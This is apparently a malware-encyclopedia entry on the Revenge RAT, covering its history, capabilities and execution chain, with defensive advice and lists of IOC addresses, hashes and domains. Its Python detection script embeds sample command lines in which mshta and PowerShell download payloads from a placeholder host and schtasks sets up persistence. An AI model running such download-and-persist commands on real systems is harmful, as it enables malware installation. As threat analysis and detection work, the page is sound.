Revenge

Revenge was one of the most popular remote access trojans in use in 2019, when it featured in a large malicious campaign named "Aggah". The malware takes remote control of infected machines and spies on their users.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 28 September, 2020
Global rank: 32
Week rank: 17
Month rank: 24
IOCs: 1919

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans, meaning attackers typically use it to control infected PCs remotely or to spy on users by logging keystrokes and even watching the computer's surroundings through remote webcam and microphone access.

First discovered in 2016, Revenge RAT remains a threat today, with a large spike in activity observed in 2019, when the malware targeted corporations and government bodies around the world in a massive campaign codenamed "Aggah". Thanks to a wide variety of distribution methods, a robust core feature set and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. Its popularity was further helped by its free availability: anybody can download Revenge from underground hacking forums at no cost and use it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with the nickname Napoleon, an Arabic-speaking member of the underground hacking community.

The initial version was a simple program with little or no code obfuscation, used mainly by other Arabic-speaking cybercriminals. Despite that simplicity, at the time only one of 54 VirusTotal engines flagged the Revenge code as malicious, which puzzled researchers given its complete lack of anti-analysis techniques.

The author wrote the RAT in Visual Basic and admitted himself that it was very bare-bones at its initial release, providing only the most basic functions and falling well short of competitors in its core feature set. According to Napoleon, that was why Revenge was offered free of charge.

Two months after the initial release, the author published version v0.2 on a more popular hacking forum, this time with more features but still completely free of charge. Revenge has evolved further since then, and today it gives cybercriminals a wide range of capabilities: remote file and registry manipulation on the infected machine, access to memory, processes and services, and access to connected devices such as the keyboard, webcam and mouse, allowing the malware to record its victims' actions and collect data such as banking credentials and social-media account details.

The core malicious feature set was not the only thing that evolved over Revenge's lifetime. Improvements in distribution and persistence made the threat one to be reckoned with. In some campaigns, the first-stage scripts were embedded in the HTML of an attacker-created blogspot[.]com page and fetched from there.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service shows the execution of this malware as it unfolds.

Figure 1: Process graph of the Revenge trojan execution, showing the lifecycle of Revenge in visual form. Generated by ANY.RUN.

Figure 2: Customizable text report generated by the ANY.RUN malware analysis service, which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

The first steps of Revenge's execution vary with how it reached the victim's computer. The most common initial vector uses mshta.exe either to download the payload or to execute it directly from a URL. Once the payload is on the machine, mshta.exe sets an autorun value in the registry and starts three processes: cmd.exe, powershell.exe and schtasks.exe. cmd.exe is used to kill processes from a list; in the analysed sample, Microsoft Office processes were targeted. powershell.exe downloads the main payload, and schtasks.exe creates a scheduled task that gives Revenge persistence on the infected system. After these steps the malware is ready to execute commands from its C2 servers. For defenders, this chain (mshta.exe spawning cmd.exe, powershell.exe and schtasks.exe, together with a write to an autorun key) is the behaviour to hunt for, since none of those children are normal for mshta.exe.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest signatures. Do not disable native Windows security features, update the OS regularly, and follow security best practices when online.

In particular, avoid opening email attachments from unknown senders, and never enable macros in Microsoft Office when prompted to do so by a document that arrived in a suspicious email.

Distribution of Revenge

Revenge has been distributed in a variety of ways, some potentially more effective than others. For example, it is known to infect PCs through malicious email attachments and through malicious ads placed on compromised websites.

Most commonly, once the victim downloads and opens a malicious Microsoft Office document, Revenge uses macros to connect to an external domain, sometimes hidden inside a web page, from which further scripts and content are downloaded in stages until the actual malware is installed on the PC.
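As an added illustration of both the execution chain described in the "Revenge execution process" section (mshta.exe spawning cmd.exe, powershell.exe and schtasks.exe, plus the autorun registry write) and the macro-initiated variant described just above (an Office process spawning the downloader), the following Python walks a set of constructed Sysmon-style events and flags those relationships. This is example code added here, not ANY.RUN's tooling or anything taken from the malware; the event records, PIDs, file paths, registry value name and example.invalid URLs are all invented placeholders, and the rule names are arbitrary.

```python
"""Toy detection pass over constructed Sysmon-style events, modelled on the
Revenge RAT chain described on this page (Office macro -> mshta.exe ->
cmd.exe / powershell.exe / schtasks.exe, plus an autorun Run-key write).
Added example: the events are invented, not captured from a real sample."""
import ntpath
import re

# Constructed events. id 1 = process creation, id 13 = registry value set.
# Paths, PIDs, the "Update" value name and example.invalid URLs are placeholders.
EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "invoice.doc"'},
    {"id": 1, "pid": 5004, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/stage1.hta"},
    {"id": 13, "pid": 5004, "image": r"C:\Windows\System32\mshta.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update"},
    {"id": 1, "pid": 5100, "ppid": 5004, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c taskkill /f /im winword.exe /im excel.exe"},
    {"id": 1, "pid": 5120, "ppid": 5004,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/p')\""},
    {"id": 1, "pid": 5140, "ppid": 5004, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 60 /tn "Windows Update" '
                '/tr "mshta http://example.invalid/p"'},
    # Benign control: an administrator queries tasks from an interactive cmd.exe.
    {"id": 1, "pid": 6000, "ppid": 700, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"id": 1, "pid": 6010, "ppid": 6000, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /query"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
STAGE_CHILDREN = {"cmd.exe", "powershell.exe", "schtasks.exe"}
RUN_KEY = r"\software\microsoft\windows\currentversion\run"


def image_name(event):
    """Lower-cased file name of the event's image path."""
    return ntpath.basename(event["image"]).lower()


def analyse(events):
    """Return {pid: [reasons]} for processes matching the Revenge-style chain."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    children = {}
    for e in procs.values():
        children.setdefault(e["ppid"], []).append(e)

    hits = {}

    def flag(pid, reason):
        hits.setdefault(pid, []).append(reason)

    for e in procs.values():
        name = image_name(e)
        parent = procs.get(e["ppid"])
        parent_name = image_name(parent) if parent else ""

        if name == "mshta.exe":
            # Macro-initiated variant: an Office application launched mshta.exe.
            if parent_name in OFFICE:
                flag(e["pid"], "office_spawned_mshta")
            # Direct execution from / download via a URL on the command line.
            if re.search(r"https?://", e["cmdline"], re.I):
                flag(e["pid"], "mshta_remote_url")
            # The three-child fan-out described in the execution section.
            kids = {image_name(c) for c in children.get(e["pid"], [])} & STAGE_CHILDREN
            if kids:
                flag(e["pid"], "mshta_spawned_" + "+".join(sorted(kids)))

        # cmd.exe under mshta.exe killing Office processes.
        if name == "cmd.exe" and parent_name == "mshta.exe":
            cl = e["cmdline"].lower()
            if "taskkill" in cl and any(o in cl for o in OFFICE):
                flag(e["pid"], "office_processes_killed")

        # schtasks.exe under mshta.exe creating a task (persistence).
        if name == "schtasks.exe" and parent_name == "mshta.exe" \
                and "/create" in e["cmdline"].lower():
            flag(e["pid"], "scheduled_task_persistence")

    # Autorun value written under a Run key, attributed to the writing process.
    for e in events:
        if e["id"] == 13 and RUN_KEY in e["target"].lower():
            flag(e["pid"], f"{image_name(e)}_wrote_run_key")

    return {pid: sorted(r) for pid, r in hits.items()}


if __name__ == "__main__":
    for pid, reasons in analyse(EVENTS).items():
        print(pid, ", ".join(reasons))
```

Each rule on its own is only a signal (mshta.exe with a URL argument does occur in some legitimate deployments), so in practice these would be scored together per process tree rather than alerted on individually; the benign schtasks.exe /query from an interactive shell in the sample data produces no finding, while the mshta.exe tree collects four.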

How to detect Revenge RAT using ANY.RUN?

Analysts can see which MITRE ATT&CK™ techniques the malware applied by clicking the "ATT&CK™ MATRIX" button.

Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch among Remote Access Trojans. It began life as a simplistic piece of malware with limited functionality and no anti-analysis features, but has evolved into a capable and persistent trojan used in massive attacks in Europe, North America, Asia and the Middle East.

The popularity of this malware is due not only to its robust feature set but also to its ready availability, since Revenge can be downloaded for free from a number of underground communities.

Professionals can build a solid defense against Revenge and similar RATs, and protect their corporate or government networks, by reverse engineering and studying the threat with malware hunting services such as ANY.RUN.

IOCs

IP addresses
3.134.125.175
193.161.193.99
192.169.69.25
3.130.209.29
79.134.225.73
3.13.191.225
45.157.214.248
3.131.123.134
79.134.225.88
199.19.224.65
79.134.225.105
189.84.162.211
79.134.225.72
3.125.223.134
3.124.142.205
197.2.100.116
191.205.215.182
79.134.225.82
193.56.28.101
179.126.74.196
Hashes
862c9d7b0420f73fa282a6f84f120ef88e6caa02fd983cda623bfb69854c20f7
5c0ec56a68c46272465f6e63d9291095e097f0c4ec0ab029f055a4a10d396cc5
78e42d74899e82219d14181ee6ce6b7a72a426dee20990a73c3599a59e22f90d
7fc30a866b6ce3adead00c44d86d64f6d8d0415834d3fc9145fc1dd104174243
6226d135ddfad149e446daacb6150bbb273497309ee8809679b6ae8230dc7b8e
3f7224ce74a67b29b2d6559fc13263545e417e040d21749fa02a76d2ad05e508
aee4cbba6624d183b3d6dde9ea56914d891ea585cf556433dc5a9f31bb5b9a7d
bd51f2ab71483b1538d9a29eb36cf1928314b8987cc5eb439f77fdccce0da422
cafb9d016b5e787e518dfdbe1c8c51f8677c4ef38fceef7ed0bb61195fd3d7e9
01233689c67aa8c608ef67e84260ceaf9d5aa3847098612277a5836f1535411f
2183a71f544a5968db789d4f2dd872c8c34cbfd12870db43903ce8759bcb9d7c
b10032241b88c70a52cd141b4c6ad559cd1da780e79ef32a1e059a8e1acc6332
37dbf3b26ddc049072ec24e6bc972ff5b840cefb0066632e9747e141006f3d26
0c6454f0457b3cb8cf68cac1203ba507b526f036e67543ad6e7d186c2d05e1ca
cf74c21533aff071f0222685dd6d1146e15f1174d24f492eebdaa961cbbc2853
25c2e53fa97296ce274d973b573c92650db3aa188efdf473ed5a3c54c8ea9872
ca7178f8be784492284c2a2c60560ab325470f4ed52b1d232fd53c0a2355092e
53afd7e9d6f7b899c9349a8d8cd2e05f35c58edb3d775752b5ebaac96a80edf7
92ca9e2d1efcbf4cabd517930e4e0c9b6b329ca2e18a8e5c81f196296a72f093
bbcf4a37eb9e6a37e332157c3910bd985c01a75f4b9dd91369db67e2ea44c13e
Domains
majul.com
isns.net
helpout.duckdns.org
kenzeey.duckdns.org
intrament.duckdns.org
amachichystdyjakelogontothecomputer15bvn.duckdns.org
20greenkegheedahatakankeadeshnaastdyhma.duckdns.org
stdychinese2onlyywalkaloneinlifev14fas.duckdns.org
https.webemail.office.tr0uakvdlhfpux0h14z3glqe8uhjd.k67ohsh74r947lhd1mkh6.77h6bvhxdy9khha143q.601at76hd7p8jzjyps8xnsk0m.utzs74k51hiknye31.6fqf25lg71d7qujv1lm6s0jl64k70.leb7ycqkqa2hc7lolftj1tkrho.bdvehe.duckdns.org
webemail.office.tr0uakvdlhfpux0h14z3glqe8uhjd.k67ohsh74r947lhd1mkh6.77h6bvhxdy9khha143q.601at76hd7p8jzjyps8xnsk0m.utzs74k51hiknye31.6fqf25lg71d7qujv1lm6s0jl64k70.leb7ycqkqa2hc7lolftj1tkrho.bdvehe.duckdns.org
tasklistmgr.duckdns.org
javiersalazar87.duckdns.org
27dejulio.duckdns.org
mail123.duckdns.org
javiertrabajovalle.duckdns.org
wsdykung37communicationtarisupliermgcxa.duckdns.org
orlandoblunblun2020.duckdns.org
myfrontmanny.duckdns.org
switchtocloudsystemwithservergoogleapi.duckdns.org
u7546u53y4wrewegrdfgwe.duckdns.org
